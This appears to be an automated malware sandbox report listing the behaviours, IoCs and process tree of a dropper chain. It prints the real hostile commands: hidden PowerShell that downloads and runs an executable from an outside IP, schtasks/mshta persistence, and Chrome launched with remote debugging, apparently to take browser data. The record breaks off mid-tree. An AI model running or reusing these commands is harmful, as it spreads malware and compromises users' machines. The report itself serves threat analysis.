Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
4236	taskkill.exe
5376	taskkill.exe
5128	taskkill.exe
5344	taskkill.exe
3616	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857014729550329"	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4408	schtasks.exe
2284	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
1124	3D9ML36IIYJUDX6SUS4T.exe
1124	3D9ML36IIYJUDX6SUS4T.exe
3956	rapes.exe
3956	rapes.exe
2120	powershell.exe
2120	powershell.exe
2120	powershell.exe
2364	TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
2364	TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
4088	powershell.exe
4088	powershell.exe
4088	powershell.exe
888	powershell.exe
888	powershell.exe
888	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
4996	483d2fa8a0d53818306efeb32d3.exe
4996	483d2fa8a0d53818306efeb32d3.exe
4700	FvbuInU.exe
4700	FvbuInU.exe
4700	FvbuInU.exe
4700	FvbuInU.exe
4700	FvbuInU.exe
4700	FvbuInU.exe
1464	ce4pMzk.exe
1464	ce4pMzk.exe
1464	ce4pMzk.exe
1464	ce4pMzk.exe
1464	ce4pMzk.exe
5016	rapes.exe
5016	rapes.exe
2488	MCxU5Fj.exe
2488	MCxU5Fj.exe
2488	MCxU5Fj.exe
2488	MCxU5Fj.exe
3468	v6Oqdnc.exe
3468	v6Oqdnc.exe
3468	v6Oqdnc.exe
3468	v6Oqdnc.exe
3468	v6Oqdnc.exe
3468	v6Oqdnc.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
3196	powershell.exe
3196	powershell.exe
3196	powershell.exe
2168	mAtJWNv.exe
2168	mAtJWNv.exe
2168	mAtJWNv.exe
2168	mAtJWNv.exe
1644	chrome.exe
1644	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	1464	ce4pMzk.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeShutdownPrivilege	1644	chrome.exe
Token: SeCreatePagefilePrivilege	1644	chrome.exe
Token: SeShutdownPrivilege	1644	chrome.exe
Token: SeCreatePagefilePrivilege	1644	chrome.exe
Token: SeShutdownPrivilege	1644	chrome.exe
Token: SeCreatePagefilePrivilege	1644	chrome.exe
Token: SeDebugPrivilege	5304	powershell.exe
Token: SeShutdownPrivilege	1644	chrome.exe
Token: SeCreatePagefilePrivilege	1644	chrome.exe
Token: SeShutdownPrivilege	1644	chrome.exe
Token: SeCreatePagefilePrivilege	1644	chrome.exe
Token: SeShutdownPrivilege	1644	chrome.exe
Token: SeCreatePagefilePrivilege	1644	chrome.exe
Token: SeShutdownPrivilege	3444	Explorer.EXE
Token: SeCreatePagefilePrivilege	3444	Explorer.EXE
Token: SeShutdownPrivilege	1644	chrome.exe
Token: SeCreatePagefilePrivilege	1644	chrome.exe
Token: SeShutdownPrivilege	1644	chrome.exe
Token: SeCreatePagefilePrivilege	1644	chrome.exe
Token: SeDebugPrivilege	5236	d77ee32371.exe
Token: SeShutdownPrivilege	3444	Explorer.EXE
Token: SeCreatePagefilePrivilege	3444	Explorer.EXE
Token: SeLockMemoryPrivilege	5880	notepad.exe
Token: SeLockMemoryPrivilege	5880	notepad.exe
Token: SeDebugPrivilege	5136	tasklist.exe
Token: SeShutdownPrivilege	3444	Explorer.EXE
Token: SeCreatePagefilePrivilege	3444	Explorer.EXE
Token: SeShutdownPrivilege	3444	Explorer.EXE
Token: SeCreatePagefilePrivilege	3444	Explorer.EXE
Token: SeShutdownPrivilege	3444	Explorer.EXE
Token: SeCreatePagefilePrivilege	3444	Explorer.EXE
Token: SeDebugPrivilege	2860	tasklist.exe
Token: SeShutdownPrivilege	3444	Explorer.EXE
Token: SeCreatePagefilePrivilege	3444	Explorer.EXE
Token: SeShutdownPrivilege	3444	Explorer.EXE
Token: SeCreatePagefilePrivilege	3444	Explorer.EXE

Suspicious use of FindShellTrayWindow 56 IoCs

pid	Process
1124	3D9ML36IIYJUDX6SUS4T.exe
232	957bc300ff.exe
232	957bc300ff.exe
232	957bc300ff.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
1644	chrome.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
6112	msedge.exe
5880	notepad.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
232	957bc300ff.exe
232	957bc300ff.exe
232	957bc300ff.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3444	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4508 wrote to memory of 1124	4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe	97
PID 4508 wrote to memory of 1124	4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe	97
PID 4508 wrote to memory of 1124	4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe	97
PID 1124 wrote to memory of 3956	1124	3D9ML36IIYJUDX6SUS4T.exe	98
PID 1124 wrote to memory of 3956	1124	3D9ML36IIYJUDX6SUS4T.exe	98
PID 1124 wrote to memory of 3956	1124	3D9ML36IIYJUDX6SUS4T.exe	98
PID 3956 wrote to memory of 232	3956	rapes.exe	101
PID 3956 wrote to memory of 232	3956	rapes.exe	101
PID 3956 wrote to memory of 232	3956	rapes.exe	101
PID 232 wrote to memory of 888	232	957bc300ff.exe	102
PID 232 wrote to memory of 888	232	957bc300ff.exe	102
PID 232 wrote to memory of 888	232	957bc300ff.exe	102
PID 232 wrote to memory of 4932	232	957bc300ff.exe	103
PID 232 wrote to memory of 4932	232	957bc300ff.exe	103
PID 232 wrote to memory of 4932	232	957bc300ff.exe	103
PID 888 wrote to memory of 4408	888	cmd.exe	105
PID 888 wrote to memory of 4408	888	cmd.exe	105
PID 888 wrote to memory of 4408	888	cmd.exe	105
PID 4932 wrote to memory of 2120	4932	mshta.exe	106
PID 4932 wrote to memory of 2120	4932	mshta.exe	106
PID 4932 wrote to memory of 2120	4932	mshta.exe	106
PID 3956 wrote to memory of 1828	3956	rapes.exe	108
PID 3956 wrote to memory of 1828	3956	rapes.exe	108
PID 3956 wrote to memory of 1828	3956	rapes.exe	108
PID 1828 wrote to memory of 2040	1828	cmd.exe	110
PID 1828 wrote to memory of 2040	1828	cmd.exe	110
PID 1828 wrote to memory of 2040	1828	cmd.exe	110
PID 2120 wrote to memory of 2364	2120	powershell.exe	111
PID 2120 wrote to memory of 2364	2120	powershell.exe	111
PID 2120 wrote to memory of 2364	2120	powershell.exe	111
PID 1828 wrote to memory of 3952	1828	cmd.exe	112
PID 1828 wrote to memory of 3952	1828	cmd.exe	112
PID 1828 wrote to memory of 3952	1828	cmd.exe	112
PID 3952 wrote to memory of 4208	3952	cmd.exe	113
PID 3952 wrote to memory of 4208	3952	cmd.exe	113
PID 3952 wrote to memory of 4208	3952	cmd.exe	113
PID 1828 wrote to memory of 2396	1828	cmd.exe	114
PID 1828 wrote to memory of 2396	1828	cmd.exe	114
PID 1828 wrote to memory of 2396	1828	cmd.exe	114
PID 2396 wrote to memory of 4088	2396	cmd.exe	115
PID 2396 wrote to memory of 4088	2396	cmd.exe	115
PID 2396 wrote to memory of 4088	2396	cmd.exe	115
PID 1828 wrote to memory of 2688	1828	cmd.exe	116
PID 1828 wrote to memory of 2688	1828	cmd.exe	116
PID 1828 wrote to memory of 2688	1828	cmd.exe	116
PID 2688 wrote to memory of 888	2688	cmd.exe	117
PID 2688 wrote to memory of 888	2688	cmd.exe	117
PID 2688 wrote to memory of 888	2688	cmd.exe	117
PID 3956 wrote to memory of 1580	3956	rapes.exe	118
PID 3956 wrote to memory of 1580	3956	rapes.exe	118
PID 3956 wrote to memory of 1580	3956	rapes.exe	118
PID 1828 wrote to memory of 2284	1828	cmd.exe	120
PID 1828 wrote to memory of 2284	1828	cmd.exe	120
PID 1828 wrote to memory of 2284	1828	cmd.exe	120
PID 1580 wrote to memory of 2456	1580	nhDLtPT.exe	119
PID 1580 wrote to memory of 2456	1580	nhDLtPT.exe	119
PID 1580 wrote to memory of 2456	1580	nhDLtPT.exe	119
PID 1828 wrote to memory of 2532	1828	cmd.exe	121
PID 1828 wrote to memory of 2532	1828	cmd.exe	121
PID 1828 wrote to memory of 2532	1828	cmd.exe	121
PID 2532 wrote to memory of 2324	2532	mshta.exe	122
PID 2532 wrote to memory of 2324	2532	mshta.exe	122
PID 2532 wrote to memory of 2324	2532	mshta.exe	122
PID 2324 wrote to memory of 4996	2324	powershell.exe	124

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3444
- C:\Users\Admin\AppData\Local\Temp\7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
  "C:\Users\Admin\AppData\Local\Temp\7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4508
- - C:\Users\Admin\AppData\Local\Temp\3D9ML36IIYJUDX6SUS4T.exe
    "C:\Users\Admin\AppData\Local\Temp\3D9ML36IIYJUDX6SUS4T.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1124
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3956
    - - C:\Users\Admin\AppData\Local\Temp\10108470101\957bc300ff.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10108470101\957bc300ff.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:232
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn LDwEFmae8T4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\OGKX5sKG4.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:888
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn LDwEFmae8T4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\OGKX5sKG4.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4408
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\OGKX5sKG4.hta
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
        
        "C:\Users\Admin\AppData\Local\TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2364
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1828
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2040
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4208
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4088
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:888
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "5kKhSmabJyR" /tr "mshta \"C:\Temp\9j4XvoNY6.hta\"" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2284
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\9j4XvoNY6.hta"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4996
    - - C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1580
      - C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2456
    - - C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4380
    - - C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4700
    - - C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:4320
      - C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2168
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1644
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe46b0cc40,0x7ffe46b0cc4c,0x7ffe46b0cc58
        8⤵
        
        PID:3304
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:2
        8⤵
        
        PID:1132
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2148 /prefetch:3
        8⤵
        
        PID:3500
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2440 /prefetch:8
        8⤵
        
        PID:2808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3156 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3204 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4328
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4452 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4384 /prefetch:8
        8⤵
        
        PID:5136
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4456,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8
        8⤵
        
        PID:5152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4988,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4168 /prefetch:8
        8⤵
        
        PID:5348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4776 /prefetch:8
        8⤵
        
        PID:5908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4620 /prefetch:8
        8⤵
        
        PID:6136
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4864,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5176 /prefetch:8
        8⤵
        
        PID:2120
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,11199519152205436365,2553684636889237730,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5256 /prefetch:8
        8⤵
        
        PID:5188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
